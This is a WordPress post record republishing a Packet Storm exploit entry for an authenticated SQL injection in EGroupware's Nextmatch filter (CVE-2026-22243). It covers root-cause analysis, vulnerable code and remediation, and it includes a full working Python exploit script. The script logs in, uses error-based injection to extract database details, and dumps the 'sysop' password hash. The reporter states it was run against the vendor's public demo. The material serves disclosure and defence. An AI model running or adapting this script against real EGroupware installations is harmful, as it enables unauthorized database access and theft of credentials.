{"id":46309,"date":"2026-04-13T11:50:34","date_gmt":"2026-04-13T11:50:34","guid":{"rendered":"http:\/\/localhost\/?p=46309"},"modified":"2026-04-13T11:50:34","modified_gmt":"2026-04-13T11:50:34","slug":"egroupware-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=46309","title":{"rendered":"\ud83d\udcc4 EGroupware SQL Injection_PACKETSTORM:218757"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:48:46&#8243;,&#8221;description&#8221;:&#8221;EGroupware versions prior to 23.1.20260113 and greater than or equal to 26.0.20251208 but less than 26.0.20260113 are affected by a remote SQL injection vulnerability in the Nextmatch filter processing&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 EGroupware SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218757&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-22243&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-22243: EGroupware has SQL Injection in Nextmatch Filter Processing\\n    \\n    ## Overview\\n    \\n    | Field | Details |\\n    |&#8212;|&#8212;|\\n    | **CVE ID** | [CVE-2026-22243](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-22243) |\\n    | **Severity** | HIGH |\\n    | **Advisory** | [View Advisory](https:\/\/github.com\/EGroupware\/egroupware\/security\/advisories\/GHSA-rvxj-7f72-mhrx) |\\n    | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n    \\n    ## Affected Products\\n    \\n    &#8211; **egroupware\/egroupware** (versions: \\u003c 23.1.20260113)\\n    &#8211; **egroupware\/egroupware** (versions: \\u003e= 26.0.20251208, \\u003c 26.0.20260113)\\n    \\n    \\n    ## CWE Classification\\n    \\n    &#8211; CWE-89: Improper Neutralization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)\\n    \\n    ## Details\\n    \\n    ### Summary\\n    **Critical Authenticated SQL Injection in Nextmatch Widget Filter Processing**\\n    \\n    A critical SQL Injection vulnerability exists in the core components of EGroupware, specifically in the `Nextmatch` filter processing. The flaw allows authenticated attackers to inject arbitrary SQL commands into the `WHERE` clause of database queries. This is achieved by exploiting a PHP type juggling issue where JSON decoding converts numeric strings into integers, bypassing the `is_int()` security check used by the application.\\n    \\n    ### Details\\n    **Root Cause Analysis**\\n    The vulnerability exists in how the database abstraction layer (`Api\\\\Db`) and high-level storage classes (`Api\\\\Storage\\\\Base`, `infolog_so`) process the `col_filter` array used in \\&#8221;Nextmatch\\&#8221; widgets.\\n    \\n    The application attempts to validate input using `is_int($key)` to determine if an array key represents a raw SQL fragment that should be trusted. However, when processing JSON-based POST requests, PHP&#8217;s `json_decode` automatically converts numeric string keys (e.g., `\\&#8221;0\\&#8221;`) into native integers.\\n    \\n    Consequently, an attacker can send a JSON payload with an associative array containing numeric keys. The application interprets these keys as integers (`is_int` returns true) and blindly appends the associated values &#8211; containing malicious SQL &#8211; directly to the query.\\n    \\n    **Vulnerable Code Locations**\\n    \\n    1. **File:** `sources\/egroupware\/api\/src\/Db.php` (Approx. Line 1776)\\n       Method: `column_data_implode`\\n    \\n    &#8220;`php\\n    \/\/ In function column_data_implode\\n    elseif (is_int($key) \\u0026\\u0026 $use_key===True) {\\n         if (empty($data)) continue;\\n         \/\/ VULNERABLE: $data is appended directly to SQL without sanitization\\n         $values[] = $data; \\n    }\\n    &#8220;`\\n    \\n    2. **File:** `sources\/egroupware\/api\/src\/Storage\/Base.php` (Approx. Line 1134)\\n       Method: `parse_search`\\n    \\n    &#8220;`php\\n    \/\/ In function parse_search\\n    foreach($criteria as $col =\\u003e $val) {\\n         \/\/ VULNERABLE: is_int() returns true for JSON keys like \\&#8221;0\\&#8221;\\n         if (is_int($col)) {\\n             $query[] = $val; \\n         }\\n         \/\/ &#8230;\\n    }\\n    &#8220;`\\n    \\n    ### PoC\\n    I have verified this vulnerability on a local Docker instance and confirmed it (read-only) on your public demo instance ([demo.egroupware.net](http:\/\/demo.egroupware.net\/)).\\n    \\n    \\n    **Automated Exploit Script:**\\n    The following script automates the login, exec_id extraction, and data exfiltration via Error-Based SQL Injection.\\n    \\n    &#8220;`python\\n    import requests\\n    import re\\n    import sys\\n    import urllib3\\n    \\n    # Suppress SSL warnings\\n    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n    \\n    # CLI Configuration\\n    BASE_URL = sys.argv[1].rstrip(&#8216;\/&#8217;) if len(sys.argv) \\u003e 1 else \\&#8221;http:\/\/localhost:8088\/egroupware\\&#8221;\\n    LOGIN_USER = sys.argv[2] if len(sys.argv) \\u003e 2 else \\&#8221;sysop\\&#8221;\\n    LOGIN_PASS = sys.argv[3] if len(sys.argv) \\u003e 3 else \\&#8221;password123\\&#8221;\\n    \\n    session = requests.Session()\\n    session.verify = False\\n    session.headers.update({\\n        \\&#8221;User-Agent\\&#8221;: \\&#8221;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/115.0.0.0 Safari\/537.36\\&#8221;\\n    })\\n    \\n    def extract_form_inputs(html):\\n        inputs = {}\\n        matches = re.findall(r&#8217;\\u003cinput[^\\u003e]+\\u003e&#8217;, html)\\n        for match in matches:\\n            name_m = re.search(r&#8217;name=[\\&#8221;\\\\&#8217;]([^\\&#8221;\\\\&#8217;]+)[\\&#8221;\\\\&#8217;]&#8217;, match)\\n            value_m = re.search(r&#8217;value=[\\&#8221;\\\\&#8217;]([^\\&#8221;\\\\&#8217;]*)[\\&#8221;\\\\&#8217;]&#8217;, match)\\n            if name_m:\\n                name = name_m.group(1)\\n                value = value_m.group(1) if value_m else \\&#8221;\\&#8221;\\n                inputs[name] = value\\n        return inputs\\n    \\n    def login():\\n        print(f\\&#8221;[*] Target: {BASE_URL}\\&#8221;)\\n        login_url = f\\&#8221;{BASE_URL}\/login.php\\&#8221;\\n        \\n        try:\\n            print(\\&#8221;[*] Retrieving login form&#8230;\\&#8221;)\\n            r_get = session.get(login_url, timeout=10)\\n            \\n            data = extract_form_inputs(r_get.text)\\n            \\n            data.update({\\n                \\&#8221;login\\&#8221;: LOGIN_USER,\\n                \\&#8221;passwd\\&#8221;: LOGIN_PASS,\\n                \\&#8221;submitit\\&#8221;: \\&#8221;Login\\&#8221;,\\n                \\&#8221;passwd_type\\&#8221;: \\&#8221;text\\&#8221;\\n            })\\n            \\n            if &#8216;cancel&#8217; in data: del data[&#8216;cancel&#8217;]\\n    \\n            print(f\\&#8221;[*] Attempting login as: {LOGIN_USER}&#8230;\\&#8221;)\\n            r_post = session.post(login_url, data=data, allow_redirects=True, timeout=15)\\n            \\n            if &#8216;name=\\&#8221;passwd\\&#8221;&#8216; in r_post.text and &#8216;logout.php&#8217; not in r_post.text:\\n                print(\\&#8221;[-] Login failed. Server returned login form.\\&#8221;)\\n                return False\\n                \\n            print(\\&#8221;[+] Login successful.\\&#8221;)\\n            return True\\n        except Exception as e:\\n            print(f\\&#8221;[-] Critical error during login: {e}\\&#8221;)\\n            return False\\n    \\n    def get_exec_id():\\n        print(\\&#8221;[*] Retrieving exec_id&#8230;\\&#8221;)\\n        url = f\\&#8221;{BASE_URL}\/index.php?menuaction=addressbook.addressbook_ui.index\\&#8221;\\n        try:\\n            r = session.get(url, timeout=10)\\n            \\n            match = re.search(r&#8217;etemplate_exec_id(?:\\&#8221;|\\&#8221;|\\\\\\\\\\&#8221;)\\\\s*:\\\\s*(?:\\&#8221;|\\&#8221;|\\\\\\\\\\&#8221;)([^\\u0026\\&#8221;\\\\\\\\]+)&#8217;, r.text)\\n            \\n            if match:\\n                eid = match.group(1)\\n                print(f\\&#8221;[+] ID found: {eid}\\&#8221;)\\n                return eid\\n            else:\\n                if &#8216;name=\\&#8221;passwd\\&#8221;&#8216; in r.text:\\n                    print(\\&#8221;[-] Session expired or login failed.\\&#8221;)\\n                else:\\n                    print(\\&#8221;[-] exec_id pattern not found in source code.\\&#8221;)\\n        except Exception as e:\\n            print(f\\&#8221;[-] Error retrieving ID: {e}\\&#8221;)\\n        return None\\n    \\n    def run_query(eid, sql):\\n        full = \\&#8221;\\&#8221;\\n        url = f\\&#8221;{BASE_URL}\/json.php?menuaction=EGroupware\\\\\\\\Api\\\\\\\\Etemplate\\\\\\\\Widget\\\\\\\\Nextmatch::ajax_get_rows\\&#8221;\\n        \\n        print(f\\&#8221;[*] Executing SQLi: {sql}\\&#8221;)\\n        \\n        for offset in range(1, 201, 30):\\n            chunk_sql = f\\&#8221;SUBSTRING(({sql}), {offset}, 30)\\&#8221;\\n            payload = f\\&#8221;1=1 AND EXTRACTVALUE(1, CONCAT(0x7e, ({chunk_sql}), 0x7e))\\&#8221;\\n            \\n            post_data = {\\n                \\&#8221;request\\&#8221;: {\\n                    \\&#8221;parameters\\&#8221;: [eid, {\\&#8221;start\\&#8221;: 0, \\&#8221;num_rows\\&#8221;: 1}, {\\&#8221;col_filter\\&#8221;: {\\&#8221;0\\&#8221;: payload}}]\\n                }\\n            }\\n            \\n            try:\\n                r = session.post(url, json=post_data, timeout=10)\\n                \\n                match = re.search(r\\&#8221;XPATH syntax error: &#8216;~(.*)~&#8217;\\&#8221;, r.text)\\n                if not match:\\n                    match = re.search(r\\&#8221;~([^~]+)~\\&#8221;, r.text)\\n                \\n                if match:\\n                    chunk = match.group(1)\\n                    if \\&#8221;&#8230;\\&#8221; in chunk: chunk = chunk.replace(\\&#8221;&#8230;\\&#8221;, \\&#8221;\\&#8221;)\\n                    \\n                    full += chunk\\n                    if len(chunk) \\u003c 1: break\\n                else:\\n                    break\\n                    \\n            except Exception as e:\\n                print(f\\&#8221;[-] Query error: {e}\\&#8221;)\\n                break\\n                \\n        return full if full else \\&#8221;NO DATA \/ ERROR\\&#8221;\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        if login():\\n            eid = get_exec_id()\\n            if eid:\\n                print(\\&#8221;\\\\n\\&#8221; + \\&#8221;=\\&#8221;*40)\\n                print(\\&#8221; SQL INJECTION RESULTS \\&#8221;)\\n                print(\\&#8221;=\\&#8221;*40)\\n                print(f\\&#8221;[+] DB Version: {run_query(eid, &#8216;SELECT @@version&#8217;)}\\&#8221;)\\n                print(f\\&#8221;[+] DB Name:    {run_query(eid, &#8216;SELECT database()&#8217;)}\\&#8221;)\\n                print(f\\&#8221;[+] DB User:    {run_query(eid, &#8216;SELECT user()&#8217;)}\\&#8221;)\\n                \\n                print(\\&#8221;\\\\n[*] Retrieving hash for &#8216;sysop&#8217; user (if exists):\\&#8221;)\\n                res = run_query(eid, \\&#8221;SELECT CONCAT(account_lid,&#8217;:&#8217;,account_pwd) FROM egw_accounts WHERE account_lid=&#8217;sysop&#8217;\\&#8221;)\\n                print(f\\&#8221; \\u003e {res}\\&#8221;)\\n                print(\\&#8221;=\\&#8221;*40 + \\&#8221;\\\\n\\&#8221;)\\n    &#8220;`\\n    \\n    **Proof of Verification** on [demo.egroupware.net](http:\/\/demo.egroupware.net\/): \\n    \\n    I executed the script against your public demo to confirm exploitability in a production-like environment (read-only).\\n    \\u003cimg width=\\&#8221;773\\&#8221; height=\\&#8221;393\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/ae97ea37-21fa-4718-98f5-f7f9696f3c2e\\&#8221; \/\\u003e\\n    \\n    **Impact:**\\n    Attackers with low-privileged access can fully compromise the database. This allows for:\\n    * **Confidentiality Loss:** Reading sensitive data (e.g., password hashes, session tokens, personal contact details, configuration secrets).\\n    * **Integrity Loss:** Modifying or deleting arbitrary data within the application.\\n    * **Availability Loss:** Potential to drop tables or corrupt data.\\n    \\n    ### Remediation\\n    **1. Input Validation (Whitelisting)**\\n    Do not rely solely on `is_int()` for security decisions when handling external input, especially JSON data where keys can be numeric strings. Implement a strict **whitelist (allowlist)** of allowed column names for filtering in `Nextmatch` widgets. If the key\/column is not in the whitelist, reject the request.\\n    \\n    **2. Parameter Binding**\\n    Ensure all filter values are bound as parameters (prepared statements) rather than being concatenated directly into the SQL string.\\n    \\n    **3. Strict Type Checking**\\n    When processing JSON input, ensure that keys are strictly checked against expected types (e.g., using `===` for strict comparison or `filter_var`) before being used in SQL generation logic.\\n    \\n    \\n    ### Credits\\n    \\n    Reported by \u0141ukasz Rybak\\n    \\n    ## References\\n    \\n    &#8211; https:\/\/github.com\/EGroupware\/egroupware\/security\/advisories\/GHSA-rvxj-7f72-mhrx\\n    &#8211; https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-22243\\n    &#8211; https:\/\/github.com\/EGroupware\/egroupware\/releases\/tag\/23.1.20260113\\n    &#8211; https:\/\/github.com\/EGroupware\/egroupware\/releases\/tag\/26.0.20260113\\n    &#8211; https:\/\/github.com\/advisories\/GHSA-rvxj-7f72-mhrx\\n    \\n    \\n    ## Disclaimer\\n    \\n    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/218757&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.8,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/218757\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:48:46&#8243;,&#8221;description&#8221;:&#8221;EGroupware versions prior to 23.1.20260113 and greater than or equal to 26.0.20251208 but less than 26.0.20260113 are affected by a remote SQL injection vulnerability in&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-46309","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 EGroupware SQL Injection_PACKETSTORM:218757 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=46309\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 EGroupware SQL Injection_PACKETSTORM:218757 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:48:46&#8243;,&#8221;description&#8221;:&#8221;EGroupware versions prior to 23.1.20260113 and greater than or equal to 26.0.20251208 but less than 26.0.20260113 are affected by a remote SQL injection vulnerability in...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=46309\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-13T11:50:34+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46309#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46309\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 EGroupware SQL Injection_PACKETSTORM:218757\",\"datePublished\":\"2026-04-13T11:50:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46309\"},\"wordCount\":1616,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46309#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46309\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46309\",\"name\":\"\ud83d\udcc4 EGroupware SQL Injection_PACKETSTORM:218757 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-13T11:50:34+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46309#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46309\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46309#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 EGroupware SQL Injection_PACKETSTORM:218757\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 EGroupware SQL Injection_PACKETSTORM:218757 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=46309","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 EGroupware SQL Injection_PACKETSTORM:218757 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:48:46&#8243;,&#8221;description&#8221;:&#8221;EGroupware versions prior to 23.1.20260113 and greater than or equal to 26.0.20251208 but less than 26.0.20260113 are affected by a remote SQL injection vulnerability in...","og_url":"https:\/\/zero.redgem.net\/?p=46309","og_site_name":"zero redgem","article_published_time":"2026-04-13T11:50:34+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=46309#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=46309"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 EGroupware SQL Injection_PACKETSTORM:218757","datePublished":"2026-04-13T11:50:34+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=46309"},"wordCount":1616,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=46309#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=46309","url":"https:\/\/zero.redgem.net\/?p=46309","name":"\ud83d\udcc4 EGroupware SQL Injection_PACKETSTORM:218757 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-13T11:50:34+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=46309#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=46309"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=46309#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 EGroupware SQL Injection_PACKETSTORM:218757"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46309","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=46309"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46309\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=46309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=46309"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=46309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}